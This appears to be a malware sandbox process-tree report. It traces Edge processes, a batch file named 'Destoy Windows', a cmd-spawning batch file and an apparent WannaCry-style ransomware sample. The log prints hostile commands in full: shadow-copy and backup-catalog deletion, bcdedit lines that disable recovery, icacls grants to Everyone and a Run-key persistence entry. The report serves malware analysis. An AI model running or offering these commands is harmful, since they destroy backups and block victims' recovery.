C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2164,81109565388450465,10667924567249947795,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2852 /prefetch:82⤵PID:2336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,81109565388450465,10667924567249947795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.5 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:12⤵PID:2348
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,81109565388450465,10667924567249947795,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1.5 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:12⤵PID:4504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,81109565388450465,10667924567249947795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.5 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5032 /prefetch:12⤵PID:4784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,81109565388450465,10667924567249947795,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1.5 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3848 /prefetch:12⤵PID:3012
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,81109565388450465,10667924567249947795,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3412 /prefetch:82⤵PID:3660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,81109565388450465,10667924567249947795,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3412 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,81109565388450465,10667924567249947795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.5 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4040 /prefetch:12⤵PID:5812
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,81109565388450465,10667924567249947795,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1.5 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3556 /prefetch:12⤵PID:1608
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,81109565388450465,10667924567249947795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.5 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:12⤵PID:1316
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,81109565388450465,10667924567249947795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.5 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4480 /prefetch:12⤵PID:872
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,81109565388450465,10667924567249947795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.5 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:12⤵PID:3232
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,81109565388450465,10667924567249947795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.5 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:12⤵PID:1328
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,81109565388450465,10667924567249947795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.5 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:12⤵PID:3472
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,81109565388450465,10667924567249947795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.5 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:12⤵PID:1628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,81109565388450465,10667924567249947795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.5 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2392 /prefetch:12⤵PID:2072
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,81109565388450465,10667924567249947795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.5 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3108 /prefetch:12⤵PID:5584
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,81109565388450465,10667924567249947795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.5 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:12⤵PID:5912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,81109565388450465,10667924567249947795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.5 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5948 /prefetch:12⤵PID:2040
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,81109565388450465,10667924567249947795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.5 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:12⤵PID:3212
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2164,81109565388450465,10667924567249947795,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4476 /prefetch:82⤵PID:5196
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,81109565388450465,10667924567249947795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.5 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:12⤵PID:1540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2164,81109565388450465,10667924567249947795,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6752 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4416
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,81109565388450465,10667924567249947795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.5 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6628 /prefetch:12⤵PID:2868
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,81109565388450465,10667924567249947795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.5 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6492 /prefetch:12⤵PID:2140
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,81109565388450465,10667924567249947795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.5 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6956 /prefetch:12⤵PID:5812
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,81109565388450465,10667924567249947795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.5 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:12⤵PID:5772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,81109565388450465,10667924567249947795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.5 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6324 /prefetch:12⤵PID:1328
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,81109565388450465,10667924567249947795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.5 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6796 /prefetch:12⤵PID:2472
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,81109565388450465,10667924567249947795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.5 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=180 /prefetch:12⤵PID:5232
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2164,81109565388450465,10667924567249947795,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6800 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4264
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2164,81109565388450465,10667924567249947795,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6832 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2164,81109565388450465,10667924567249947795,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6516 /prefetch:82⤵PID:3136
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2836
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4980
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Destoy Windows-2.bat" "1⤵PID:3616
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Destoy Windows-1.bat" "1⤵
- Drops file in Drivers directory
- Manipulates Digital Signatures
- Boot or Logon Autostart Execution: Print Processors
- Drops desktop.ini file(s)
- Drops autorun.inf file
- Drops file in System32 directory
- Modifies termsrv.dll
- Drops file in Program Files directory
- Drops file in Windows directory
PID:1392
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\spam cmd.bat" "1⤵PID:2736
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:3940
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:4024
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2320
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2288
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:3824
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:4252
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:920
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:4988
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:5212
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:6000
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:4312
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:460
-
C:\Windows\system32\SlideToShutDown.exeslidetoshutdown3⤵PID:8040
-
-
C:\Windows\system32\SlideToShutDown.exeslidetoshutdown.exe3⤵PID:2876
-
-
C:\Windows\system32\SlideToShutDown.exeslidetoshutdown3⤵PID:1892
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:6036
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:3880
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:4704
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1732
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:4428
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:3448
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1480
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:3608
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:3964
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:5976
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:6028
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:5904
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:556
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:4760
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:5192
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:3100
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:6116
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1980
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2188
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:5064
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:5608
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:3104
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:5800
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2712
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1208
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:512
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:5180
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:5048
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:6200
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:6216
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:6240
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:6264
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:6276
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:6324
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:6348
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:6404
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:6512
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:6588
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:6604
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:6612
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:6620
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:6628
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:7144
-
-
C:\Users\Admin\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"C:\Users\Admin\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"1⤵
- Drops startup file
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
PID:220 -
C:\Windows\SysWOW64\attrib.exeattrib +h .2⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:6084
-
-
C:\Windows\SysWOW64\icacls.exeicacls . /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:5760
-
-
C:\Users\Admin\Desktop\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6548
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 94101734619639.bat2⤵
- System Location Discovery: System Language Discovery
PID:6780
-
-
C:\Windows\SysWOW64\attrib.exeattrib +h +s F:\$RECYCLE2⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:1684
-
-
C:\Users\Admin\Desktop\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:6124 -
C:\Users\Admin\Desktop\TaskData\Tor\taskhsvc.exeTaskData\Tor\taskhsvc.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:7140
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /b @[email protected] vs2⤵
- System Location Discovery: System Language Discovery
PID:6964 -
C:\Users\Admin\Desktop\@[email protected]3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:6824 -
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet4⤵
- System Location Discovery: System Language Discovery
PID:6100 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4876
-
-
-
-
-
C:\Users\Admin\Desktop\taskse.exetaskse.exe C:\Users\Admin\Desktop\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6888
-
-
C:\Users\Admin\Desktop\@[email protected]2⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5920
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "nzfbkoaczl750" /t REG_SZ /d "\"C:\Users\Admin\Desktop\tasksche.exe\"" /f2⤵
- System Location Discovery: System Language Discovery
PID:6832 -
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "nzfbkoaczl750" /t REG_SZ /d "\"C:\Users\Admin\Desktop\tasksche.exe\"" /f3⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:4032
-
-
-
C:\Users\Admin\Desktop\taskse.exetaskse.exe C:\Users\Admin\Desktop\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:7292
-
-
C:\Users\Admin\Desktop\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7524
-
-
C:\Users\Admin\Desktop\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:7552
-
-
C:\Users\Admin\Desktop\taskse.exetaskse.exe C:\Users\Admin\Desktop\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5884
-
-
C:\Users\Admin\Desktop\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4148
-
-
C:\Users\Admin\Desktop\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1020
-
-
C:\Users\Admin\Desktop\taskse.exetaskse.exe C:\Users\Admin\Desktop\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6336
-
-
C:\Users\Admin\Desktop\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:6440
-
-
C:\Users\Admin\Desktop\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6476
-
-
C:\Users\Admin\Desktop\taskse.exetaskse.exe C:\Users\Admin\Desktop\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7376
-
-
C:\Users\Admin\Desktop\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3480
-
-
C:\Users\Admin\Desktop\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:8140
-
-
C:\Users\Admin\Desktop\taskse.exetaskse.exe C:\Users\Admin\Desktop\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7704
-
-
C:\Users\Admin\Desktop\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:8008
-
-
C:\Users\Admin\Desktop\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7280
-
-
C:\Users\Admin\Desktop\taskse.exetaskse.exe C:\Users\Admin\Desktop\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4732
-
-
C:\Users\Admin\Desktop\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5884
-
-
C:\Users\Admin\Desktop\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7908
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5732
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4880
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy1⤵PID:7808
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k UnistackSvcGroup1⤵
- Suspicious use of AdjustPrivilegeToken
PID:7900
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy1⤵PID:7944
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy1⤵PID:7460
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.Windows.Search_cw5n1h2txyewy1⤵PID:7472
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy1⤵PID:7512
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:7580
-
C:\Users\Admin\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"C:\Users\Admin\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7292 -
C:\Windows\SysWOW64\attrib.exeattrib +h .2⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:7400
-
-
C:\Windows\SysWOW64\icacls.exeicacls . /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:7492
-
-
C:\Users\Admin\Desktop\@[email protected]"C:\Users\Admin\Desktop\@[email protected]"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:8040
-
C:\Users\Admin\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"C:\Users\Admin\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4196 -
C:\Windows\SysWOW64\attrib.exeattrib +h .2⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:7256
-
-
C:\Windows\SysWOW64\icacls.exeicacls . /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:7344
-
-
C:\Users\Admin\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"C:\Users\Admin\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:8032 -
C:\Windows\SysWOW64\attrib.exeattrib +h .2⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:7420
-
-
C:\Windows\SysWOW64\icacls.exeicacls . /grant Everyone:F /T /C /Q2⤵
